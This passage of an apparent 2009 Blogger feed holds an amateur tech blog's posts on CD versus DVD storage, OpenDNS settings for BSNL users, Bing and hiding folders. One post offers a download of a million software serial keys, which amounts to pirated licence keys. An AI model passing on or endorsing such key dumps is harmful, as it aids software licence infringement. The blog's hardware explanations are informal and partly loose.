content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:Wingdings; 	panose-1:5 0 0 0 0 0 0 0 0 0; 	mso-font-charset:2; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:0 268435456 0 0 -2147483648 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:389353093; 	mso-list-template-ids:913442608;} @list l0:level1 	{mso-level-number-format:bullet; 	mso-level-text:; 	mso-level-tab-stop:.5in; 	mso-level-number-position:left; 	text-indent:-.25in; 	mso-ansi-font-size:10.0pt; 	font-family:Symbol;} ol 	{margin-bottom:0in;} ul 	{margin-bottom:0in;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p style="color: rgb(255, 0, 0); font-weight: bold; font-style: italic;" class="MsoNormal"&gt;Have you ever wondered how does a combo drive play both cd and dvds .?&lt;/p&gt;&lt;p style="color: rgb(255, 0, 0); font-weight: bold; font-style: italic;" class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;  &lt;p style="font-style: italic; color: rgb(255, 0, 0);" class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p style="color: rgb(255, 0, 0); font-weight: bold; font-style: italic;" class="MsoNormal"&gt;Why do combo drives often stop reading DVDs&lt;span style=""&gt;  &lt;/span&gt;but are still able to read CDs?&lt;/p&gt;&lt;p style="color: rgb(0, 0, 153); font-weight: bold; font-style: italic;" class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;  &lt;p style="color: rgb(51, 204, 255); font-weight: bold; font-style: italic;" class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p style="color: rgb(204, 0, 0);" class="MsoNormal"&gt;&lt;span style="font-weight: bold;"&gt;First lets figure out the essential differnces between CD/ DVDs&lt;/span&gt;&lt;/p&gt;  &lt;p style="font-style: italic; color: rgb(255, 255, 255);" class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;DVDs can store more data than CDs for a few reasons: &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;Higher-density data storage &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;Less overhead, more area &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;Multi-layer storage&lt;/li&gt;&lt;/ul&gt;  &lt;p&gt;Single-sided, single-layer DVDs can store about seven times more data than CDs. A large part of this increase comes from the pits and tracks being smaller on DVDs. Let's try to get an idea of how much more data can be stored due to the physically tighter spacing of pits on a DVD. The track pitch on a DVD is 2.16 times smaller, and the minimum pit length for a single-layer DVD is 2.08 times smaller than on a CD. By multiplying these two numbers, we find that there is room for about 4.5 times as many pits on a DVD. So where does the rest of the increase come from? &lt;/p&gt;  &lt;p&gt;&lt;b style=""&gt;&lt;i style=""&gt;&lt;span style="font-size:13;"&gt;More Area&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;On a CD, there is a lot of extra information encoded on the disc to allow for error correction -- this information is really just a repetition of information that is already on the disc. The error correction scheme that a CD uses is quite old and inefficient compared to the method used on DVDs. The DVD format doesn't waste as much space on error correction, enabling it to store much more real information. Another way that DVDs achieve higher capacity is by encoding data onto a slightly larger area of the disc than is done on a CD. &lt;/p&gt;  &lt;p class="MsoNormal" style=""&gt;&lt;b style=""&gt;&lt;i style=""&gt;&lt;span style="font-size:13;"&gt;Multiple-Layered Storage&lt;/span&gt;&lt;br /&gt;&lt;/i&gt;&lt;/b&gt;To increase the storage capacity even more, a DVD can have up to four layers, two on each side. The laser that reads the disc can actually focus on the second layer through the first layer. Here is a list of the capacities of different forms of DVDs:&lt;/p&gt;&lt;p class="MsoNormal" style=""&gt;&lt;br /&gt;&lt;/p&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_T53992hHLOM/SkY636H9q2I/AAAAAAAAALo/bIj31Dselbs/s1600-h/hd-dvd-disc.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 290px; height: 290px;" src="http://1.bp.blogspot.com/_T53992hHLOM/SkY636H9q2I/AAAAAAAAALo/bIj31Dselbs/s400/hd-dvd-disc.jpg" alt="" id="BLOGGER_PHOTO_ID_5352029939346287458" border="0" /&gt;&lt;/a&gt;&lt;p class="MsoNormal" style=""&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style=""&gt;&lt;b style=""&gt;&lt;i style=""&gt;&lt;span style="font-size:14;"&gt;COMBO DRIVES&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Every CD/DVD ROM has a lens which is used for reading Data.In case of combo Drive&lt;/p&gt;  &lt;p class="MsoNormal"&gt;The same read head lens is used to read both CD's and DVD's&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;There are two essential physical differences between CD and DVD disc.&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;/p&gt;&lt;p class="MsoNormal"&gt;First, the smallest DVD pits are only 0.44 micron in diameter; the equivalent CD pits are nearly twice as large, or 0.83 micron wide.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;And DVD data tracks are only 0.74 micron apart, wherea 1.6 microns separate CD data tracks. So although a DVD is the same size as a CD,its data spiral is upward of 11 kilometers long-more than twice the length of a CD's data spiral.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt; &lt;/span&gt;To read the smaller pits, a DVD player's readout beam must achieve finer focus than a CD player's does. In order to do this, it uses a read semiconductor laser that has a wave length of 635 to 650 nanometer. In contrast, CD players use infrared laser with a longer wavelength of 780 nanometer. Also, DVD players employ a more powerful focusing lens-one having a higher numerical aperture than the lens in a CD player&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;In that case after a particular time if the lens weakens only CD's are read and not DVD's.&lt;/p&gt;  &lt;p&gt;&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-4203231134419534466?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/4203231134419534466/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/06/normal-0-false-false-false.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/4203231134419534466'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/4203231134419534466'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/06/normal-0-false-false-false.html' title='CD VS DVD'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_T53992hHLOM/SkY6tF5_MII/AAAAAAAAALg/OdL8Gr27620/s72-c/large.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-833563723110158240</id><published>2009-06-12T03:49:00.000-07:00</published><updated>2009-06-12T03:51:33.327-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tricks n tips'/><title type='text'>INCREASE BROADBAND SPEED</title><content type='html'>&lt;span style="font-size:130%;"&gt;                          ONLY FOR BSNL USERS&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Speed up BSNL Broadband Internet Connection&lt;br /&gt;To overcome slow BSNL DNS problem, we will use high speed DNS servers from OpenDNS. OpenDNS is third party DNS Server used to speed up BSNL Broadband internet connection&lt;br /&gt;&lt;br /&gt;Steps to speed up BSNL Broadband Internet :&lt;br /&gt;1. Open Control Panel -&gt; Networking and Sharing Center -&gt; Manage Network Connection.&lt;br /&gt;2. Now a window showing all networks will be opened. Select BSNL Connection -&gt; Right click -&gt; Properties.&lt;br /&gt;3. Now, double click on Internet Protocol Version(TCP/IPv4) and in newly opened window at bottom, select “Use the following DNS Server address”&lt;br /&gt;4. And fill these 2 DNS Addresses in two fields:&lt;br /&gt;208.67.222.222&lt;br /&gt;208.67.220.220&lt;br /&gt;&lt;br /&gt;and hit OK. Thats it. Your BSNL Internet Broadband DNS Servers changed.&lt;br /&gt;&lt;br /&gt;Now, your BSNL internet broadband speed will be increased. Thus, you can now enjoy high speed BSNL Internet broadband. I hope you’ll like this BSNL Internet speed increasing hack/trick. If you have any problem or other high speed BSNL DNS Servers, please mention it in comments section &lt;span style="font-style: italic;"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-833563723110158240?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/833563723110158240/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/06/increase-broadband-speed.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/833563723110158240'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/833563723110158240'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/06/increase-broadband-speed.html' title='INCREASE BROADBAND SPEED'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-4090665382315176371</id><published>2009-06-11T05:27:00.000-07:00</published><updated>2009-06-11T12:43:38.349-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='general'/><title type='text'>BING</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_T53992hHLOM/SjD4grB5VlI/AAAAAAAAALQ/GResblbltGo/s1600-h/bing.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 203px;" src="http://2.bp.blogspot.com/_T53992hHLOM/SjD4grB5VlI/AAAAAAAAALQ/GResblbltGo/s400/bing.png" alt="" id="BLOGGER_PHOTO_ID_5346045997878957650" border="0" /&gt;&lt;/a&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;Microsoft’s latest search engine BING was launched a few days back and its has already started creating ripples worldwide .BING is the much touted replacement to the now defunct &lt;span style="font-weight: bold;"&gt;Windows Live &lt;/span&gt;search. I experimented with it one whole day and the results were quite surprising and quite pleasing in many cases .For instance when I typed a part of my blogsite address and searched not only did it show the site and the post in that site but also the entries I had made on Facebook regarding those blogposts .Apart from that I had published an article in DIGG which I had long forgotten ,I got its link too from the search results .Another feature of its which i liked is the preview mode where by just moving the cursor over the web page address or link   will give you a short preview of whta is in store there&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_T53992hHLOM/SjD4wL_euFI/AAAAAAAAALY/vXMgQf0X98k/s1600-h/bing1.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 232px;" src="http://1.bp.blogspot.com/_T53992hHLOM/SjD4wL_euFI/AAAAAAAAALY/vXMgQf0X98k/s400/bing1.png" alt="" id="BLOGGER_PHOTO_ID_5346046264425232466" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;Though it is too early to say that it a replacement for Google its definitely shows a lot of promise .SO friends what are u waiting for just BING!!!!!&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-4090665382315176371?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/4090665382315176371/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/06/bing.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/4090665382315176371'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/4090665382315176371'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/06/bing.html' title='BING'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_T53992hHLOM/SjD4grB5VlI/AAAAAAAAALQ/GResblbltGo/s72-c/bing.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-1932999560361361322</id><published>2009-06-01T06:34:00.000-07:00</published><updated>2009-06-01T06:47:36.788-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DOWNLOADS'/><title type='text'>1 MILLION SERIAL KEYS</title><content type='html'>&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p class="MsoNormal"&gt;Well here is a compilation of over 1 Million serial keys of the most commonly used softwares .All hav them are genuine ,however sum of them may be blacklisted that is ..if you update the software after installing it with those keys it will be freezed.However there no harm in trying&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Here is the download link&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; http://www.ziddu.com/download/4352414/1MillionSerialNumbersbyarka.doc.html&lt;/o:p&gt;&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-1932999560361361322?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/1932999560361361322/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/06/1-million-serial-keys.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/1932999560361361322'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/1932999560361361322'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/06/1-million-serial-keys.html' title='1 MILLION SERIAL KEYS'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-4597918592250783429</id><published>2009-05-31T02:59:00.000-07:00</published><updated>2009-05-31T03:01:37.587-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tricks n tips'/><title type='text'>HIDE FOLDERS IN WINDOWS</title><content type='html'>&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, 